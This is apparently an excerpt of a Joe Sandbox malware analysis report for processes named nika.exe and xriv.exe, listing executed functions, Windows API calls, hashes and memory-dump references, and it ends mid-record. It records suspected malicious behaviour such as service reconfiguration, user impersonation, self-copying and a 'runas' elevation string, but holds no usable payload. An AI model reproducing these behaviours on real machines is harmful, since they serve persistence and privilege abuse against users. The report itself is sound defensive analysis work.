_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00673742 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00673768

Part of subcall function 0067358D: __fltout2.LIBCMT ref: 006735B9

__cftog_l.LIBCMT ref: 0067378E
__cftoe_l.LIBCMT ref: 006737C0

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 726947e59875341cdb87a83be0133e492432232cff7712439198ee5eea4d0e3a
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: C5114BB200015ABBCF165E85CC45CEE3F67BB18354B988519FA2C59231D237CAB2BB85

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nika.exePID: 6036, Parent PID: 2564COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFC9D7D1A1D Relevance: 3.7, APIs: 2, Instructions: 665
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32 ref: 00007FFC9D7D1ACB
ChangeServiceConfigA.ADVAPI32 ref: 00007FFC9D7D1FD1

Memory Dump Source

Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd

Similarity

API ID: Service$ChangeConfigControl
String ID:
API String ID: 1778205439-0
Opcode ID: 5c49d11739c9481cd7eb876e309708ce26c3a3e0825fcf10b9c66c7281bf8bf6
Instruction ID: f8b1ffa4454d3d663c44a49255adc3ad078775fe37cec1f1078d1da396ecffe2
Opcode Fuzzy Hash: 5c49d11739c9481cd7eb876e309708ce26c3a3e0825fcf10b9c66c7281bf8bf6
Instruction Fuzzy Hash: 2412B530918A4D4FEB68DF28D8467F97BD0FB58311F00426ED88EC7295EB74A5818B92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D7D077D Relevance: 1.8, APIs: 1, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FFC9D7D0989

Memory Dump Source

Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: afa49cab467db73ff299f71806981a189b63f683dfc5908550cd09f264ff72d5
Instruction ID: e6e5160edfc1a47591407081d9af9ec2f8a3c732e12af8fdd9198d6d500ef23d
Opcode Fuzzy Hash: afa49cab467db73ff299f71806981a189b63f683dfc5908550cd09f264ff72d5
Instruction Fuzzy Hash: 45918030A08A5D8FEB68DF18C8557E97BE1FF59310F00413AD88DC7295DB34A981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D7D1262 Relevance: 2.3, APIs: 1, Instructions: 829
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 00007FFC9D7D17F5

Memory Dump Source

Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 8a04ff8efed501c5213764d1bd46e515ec9788941069bc2b9cef4ce5c8ce05fe
Instruction ID: b5b2ff4b499b047c268bbfb5749acdd986a36fa545cbd3256d5635522fd0013b
Opcode Fuzzy Hash: 8a04ff8efed501c5213764d1bd46e515ec9788941069bc2b9cef4ce5c8ce05fe
Instruction Fuzzy Hash: 14A10231A0CB9C4FDB59EB6898556F9BFE0EF56320F0401BFD089D31A3EA286845C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D7D0C34 Relevance: 1.7, APIs: 1, Instructions: 209
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32 ref: 00007FFC9D7D0D99

Memory Dump Source

Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: a7af5fe9e9eab0c9631d47095695a6de3f80d68f865e987a3f628571864c8bbe
Instruction ID: 05cb10b5a9cc0a1b7c952e09657002a8d5f805e869ccc6533274c49b7c18de9e
Opcode Fuzzy Hash: a7af5fe9e9eab0c9631d47095695a6de3f80d68f865e987a3f628571864c8bbe
Instruction Fuzzy Hash: 7B51B630918A4D4FEB58EF28C85A7F97BE1FB59311F10416EE84DC3296EA74E841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D7D0B2D Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FFC9D7D0BFA

Memory Dump Source

Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 91b1fa037ec960087646830370b956d5a3deb1d26afd3ce55d96e8672ddac088
Instruction ID: 8c46da5ceb2811754abca09755c7badd408c6edca2ffc5dad68602eb0ba63d25
Opcode Fuzzy Hash: 91b1fa037ec960087646830370b956d5a3deb1d26afd3ce55d96e8672ddac088
Instruction Fuzzy Hash: 3F319F3190CA1C8FDB28DF989849AFABBE0EB59311F00816FD08AD3652DB70A545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D7D108A Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FFC9D7D1145

Memory Dump Source

Source File: 00000006.00000002.315242768.00007FFC9D7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc9d7d0000_nika.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3e041b7d675c6e2e8cf393a17d153bcdaabb623953d1def14e7d881c413d71bf
Instruction ID: bbf7f51e103b350e1cdade49f10750a65811d682ae1031082683468ad57ee874
Opcode Fuzzy Hash: 3e041b7d675c6e2e8cf393a17d153bcdaabb623953d1def14e7d881c413d71bf
Instruction Fuzzy Hash: 4231E73090C78C9FDB1ADB6898157E9BFF0EF56320F04429FD089D31A2DA656456CB61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xriv.exePID: 1744, Parent PID: 1216COMMON

Executed Functions

Function 0137A9A1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0137E000,?,0137A9A0,0137AF26,?,0137E000,0137AF26,0137E000), ref: 0137A9C3
TerminateProcess.KERNEL32(00000000,?,0137A9A0,0137AF26,?,0137E000,0137AF26,0137E000), ref: 0137A9CA
ExitProcess.KERNEL32 ref: 0137A9DC

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5ffe43fb7056b254620c7ce13d5d8805218e2eb6fcfaa2215697f764f76db446
Instruction ID: ff4b435a737b800639164e48054e821d698c6f1aacf1a6f2c39973921bf54d79
Opcode Fuzzy Hash: 5ffe43fb7056b254620c7ce13d5d8805218e2eb6fcfaa2215697f764f76db446
Instruction Fuzzy Hash: DFE0B636000248ABCB326F68D808A9D3B69EB52745F194425F90597121CB3DE991DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01377A74 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,01377776), ref: 01377A79

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 343b7ae296386b3e35961c0aee6128b585aa86236a7900b50e72cfabe8e046da
Instruction ID: f86caba0a28797710b7f4011b36b403f26dcfcd71197bc003efef6b6ab599649
Opcode Fuzzy Hash: 343b7ae296386b3e35961c0aee6128b585aa86236a7900b50e72cfabe8e046da
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0137704A Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(01399708,00000FA0,?,?,01377028), ref: 01377056
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01377028), ref: 01377061
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01377028), ref: 01377072
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01377084
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01377092
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01377028), ref: 013770B5
___scrt_fastfail.LIBCMT ref: 013770C6
DeleteCriticalSection.KERNEL32(01399708,00000007,?,?,01377028), ref: 013770D1
CloseHandle.KERNEL32(00000000,?,?,01377028), ref: 013770E1

Strings

WakeAllConditionVariable, xrefs: 0137708A
SleepConditionVariableCS, xrefs: 0137707E
kernel32.dll, xrefs: 0137706D
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0137705C

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 444747a9df33cab56178116047a9459a97742f17e73d378e5c650846c806563c
Instruction ID: f7c1576a601b3b26bcfa2fc7538983c30f97c92df82a7d3f5b21196dfd6cd8a8
Opcode Fuzzy Hash: 444747a9df33cab56178116047a9459a97742f17e73d378e5c650846c806563c
Instruction Fuzzy Hash: FC0188756513116BEB321F79ED0DBAE3A9CEB85B4DF050438FA04D6248EE79C4008761

Uniqueness

Uniqueness Score: -1.00%

Function 013826AF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01382368: CreateFileW.KERNELBASE(00000000,00000000,?,01382758,?,?,00000000,?,01382758,00000000,0000000C), ref: 01382385

GetLastError.KERNEL32 ref: 013827C3
__dosmaperr.LIBCMT ref: 013827CA
GetFileType.KERNELBASE(00000000), ref: 013827D6
GetLastError.KERNEL32 ref: 013827E0
__dosmaperr.LIBCMT ref: 013827E9
CloseHandle.KERNEL32(00000000), ref: 01382809
CloseHandle.KERNEL32(0137D4F0), ref: 01382956
GetLastError.KERNEL32 ref: 01382988
__dosmaperr.LIBCMT ref: 0138298F

Strings

H, xrefs: 01382914

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: f123762d269f9d5e506690d5ab9080b6749f263ba1c8e7ec78f4b04497fca4f3
Instruction ID: ef09f1b1838666de1952d9572051a51ff39a187ec6572c2e53c015b9deb36ee5
Opcode Fuzzy Hash: f123762d269f9d5e506690d5ab9080b6749f263ba1c8e7ec78f4b04497fca4f3
Instruction Fuzzy Hash: 83A12632A002498FDF29EF7CD851BAE7BB5AF0A328F14015DF811AB391CB359812CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01369C30 Relevance: 7.7, APIs: 5, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 01369C90

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 2cc999cd6d3a1f314c4630674d5d107ef7eb35799fcee38747d5dcfe520e0bf4
Instruction ID: e7e08a93e51656703511edde20c35feb7466e38a3d1398be3a458022bd29ef7c
Opcode Fuzzy Hash: 2cc999cd6d3a1f314c4630674d5d107ef7eb35799fcee38747d5dcfe520e0bf4
Instruction Fuzzy Hash: B6A1AFB0900268CBEF24DB28CC447DDBBB9AB45318F4085E8D60967286DB755EC8CF69

Uniqueness

Uniqueness Score: -1.00%

Function 01363FF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 470
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 013642B9
SetCurrentDirectoryA.KERNEL32(00000000,774AE603), ref: 01364364

Strings

runas, xrefs: 01363B63

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: CurrentDirectorySleep
String ID: runas
API String ID: 16921501-4000483414
Opcode ID: 599ca02632fd9d6f8191ed571d625a807cd76d5a66d608a24fe6b82f9963fca2
Instruction ID: b92feb9d1e65161d9ac738195e6632fde6613cc5ce44e357b30a18fa21ea93ff
Opcode Fuzzy Hash: 599ca02632fd9d6f8191ed571d625a807cd76d5a66d608a24fe6b82f9963fca2
Instruction Fuzzy Hash: 29E12671E10245ABDB18EB7CCD4979EBF7AAB5131CF54C25CE401AB3C9DB398A408792

Uniqueness

Uniqueness Score: -1.00%

Function 0136A032 Relevance: 4.6, APIs: 3, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0136A04D
GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0136A068
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0136A1A5

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: File$AttributesCopyCreateDirectory
String ID:
API String ID: 210682061-0
Opcode ID: 600b6d787817cfdcb1712178619355d9f46cb46cd19bb2cc1eba2b76741b2849
Instruction ID: 6a0677f92bbef3fe5fc8b3c67ceae7a189e138f39f895e2ea7c6f2ba4a4523b5
Opcode Fuzzy Hash: 600b6d787817cfdcb1712178619355d9f46cb46cd19bb2cc1eba2b76741b2849
Instruction Fuzzy Hash: CD410BB1A001188FDB24DB2CCC8979CBB78AF55318F5445DCD609B7286DB356AC48F6A

Uniqueness

Uniqueness Score: -1.00%

Function 01380A55 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 01380A5E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01380ACC

Part of subcall function 01380971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01384B40,?,00000000,00000000), ref: 01380A13

Part of subcall function 0137DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E

_free.LIBCMT ref: 01380ABD

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: a538929aa8deaf3b11cef0ab5c2dc06d2cc8769e833ec807439d6d398a479799
Instruction ID: d2614dbb15849a9aab36de4588960b64f2bea58fcc7ec64370e239f444d865d9
Opcode Fuzzy Hash: a538929aa8deaf3b11cef0ab5c2dc06d2cc8769e833ec807439d6d398a479799
Instruction Fuzzy Hash: 0701ACA36013557FF73577BF5C88C7FBD6DCED6A983050229B904D2204FA598D0682B0

Uniqueness

Uniqueness Score: -1.00%

Function 01369D04 Relevance: 3.3, APIs: 2, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01369EB5
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0136A1A5

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: File$CopyModuleName
String ID:
API String ID: 4108865673-0
Opcode ID: e0e4bd40b996f9bcb9e025aa3e980526a3748e0ec919d5ff2a19b3be744e4fcc
Instruction ID: 7d5ac960b1d85c464944fd426ecd4854d8687866de289f7d5a59e30d55446e60
Opcode Fuzzy Hash: e0e4bd40b996f9bcb9e025aa3e980526a3748e0ec919d5ff2a19b3be744e4fcc
Instruction Fuzzy Hash: E2C128B1A001148FDB24DB2CCC4479DBB79AB5121CF4482E8D249A7286DB359EC98F65

Uniqueness

Uniqueness Score: -1.00%

Function 0137C59C Relevance: 3.1, APIs: 2, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0137C60A
_free.LIBCMT ref: 0137C62A

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3ee90abf8a17f64102b736b442e92c29d7eaa22b83720db3b59f28dbe848fc27
Instruction ID: 4151c16d522139b25980eddba57354ad9c42f2702119ad606bcc7796db2fa36c
Opcode Fuzzy Hash: 3ee90abf8a17f64102b736b442e92c29d7eaa22b83720db3b59f28dbe848fc27
Instruction Fuzzy Hash: 9541B536A00205AFCB24DF6CC880A5EB7B5EF89718F1954A9D915EB341D735FD02CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01384D8F Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 01384DB0

Part of subcall function 0137DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E

RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,01380E8A,?,00000004,00000002,?,?,?,0137C625,?,00000002), ref: 01384DEC

Memory Dump Source

Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true

Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1360000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: f1a4e9f0fbd95db3e3d389f5980902afa4dea1f20af59d0d58b1e5bc5fae7e7e
Instruction ID: 12db4ec09f0098de261f1b129ba8da455b372fe7b1e2050e1e951064159631dc
